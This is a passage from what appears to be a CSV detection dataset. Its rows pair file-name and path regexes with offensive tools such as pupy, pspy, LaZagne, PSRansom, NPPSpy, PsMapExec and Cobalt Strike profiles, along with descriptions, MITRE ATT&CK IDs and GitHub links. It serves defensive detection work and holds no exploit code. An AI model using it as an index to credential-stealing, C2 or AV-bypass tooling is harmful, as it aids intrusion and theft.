tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/PsMapExec.git*",".{0,1000}\/PsMapExec\.git.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*/PsMapExec/*",".{0,1000}\/PsMapExec\/.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*/psnuffle*",".{0,1000}\/psnuffle.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PSpersist.git*",".{0,1000}\/PSpersist\.git.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever a powershell process is created the implant will be executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*/pspy -*",".{0,1000}\/pspy\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/PSPY.dll*",".{0,1000}\/PSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify().
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/pspy.git*",".{0,1000}\/pspy\.git.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy.git*",".{0,1000}\/pspy\.git.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy.go*",".{0,1000}\/pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy/cmd*",".{0,1000}\/pspy\/cmd.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy/cmd/*",".{0,1000}\/pspy\/cmd\/.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy/pspy.go*",".{0,1000}\/pspy\/pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without 
root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy32*",".{0,1000}\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy64*",".{0,1000}\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/PSRansom -*",".{0,1000}\/PSRansom\s\-.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. 
you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*/psscanner.go*",".{0,1000}\/psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/psscanner/psscanner.go*",".{0,1000}\/psscanner\/psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/PSSW100AVB*",".{0,1000}\/PSSW100AVB.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework. A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","993","161","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*/pswRecovery4Moz.txt*",".{0,1000}\/pswRecovery4Moz\.txt.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.).
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*/ptunnel-ng*",".{0,1000}\/ptunnel\-ng.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*/puckiestyle/CVE-2022-0847*",".{0,1000}\/puckiestyle\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*/puppet-naivesigning.nse*",".{0,1000}\/puppet\-naivesigning\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pupwinutils/*.py*",".{0,1000}\/pupwinutils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/*.py*",".{0,1000}\/pupy\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/commands/*",".{0,1000}\/pupy\/commands\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/external/creddump7*",".{0,1000}\/pupy\/external\/creddump7.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/memimporter/*",".{0,1000}\/pupy\/memimporter\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/output/pupyx64*.exe*",".{0,1000}\/pupy\/output\/pupyx64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/pupygen.py*",".{0,1000}\/pupy\/pupygen\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy_load.*",".{0,1000}\/pupy_load\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyCmd.py*",".{0,1000}\/PupyCmd\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyCompile.py*",".{0,1000}\/PupyCompile\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupygen.py*",".{0,1000}\/pupygen\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupylib/payloads/*",".{0,1000}\/pupylib\/payloads\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyOffload.py*",".{0,1000}\/PupyOffload\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupyps.py*",".{0,1000}\/pupyps\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyServer.py*",".{0,1000}\/PupyServer\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyService.py*",".{0,1000}\/PupyService\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupysh.py*",".{0,1000}\/pupysh\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyTriggers.py*",".{0,1000}\/PupyTriggers\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyWeb.py*",".{0,1000}\/PupyWeb\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupyx64.exe*",".{0,1000}\/pupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupyx86.exe*",".{0,1000}\/pupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PurpleSharp.exe*",".{0,1000}\/PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/putter.profile*",".{0,1000}\/putter\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" 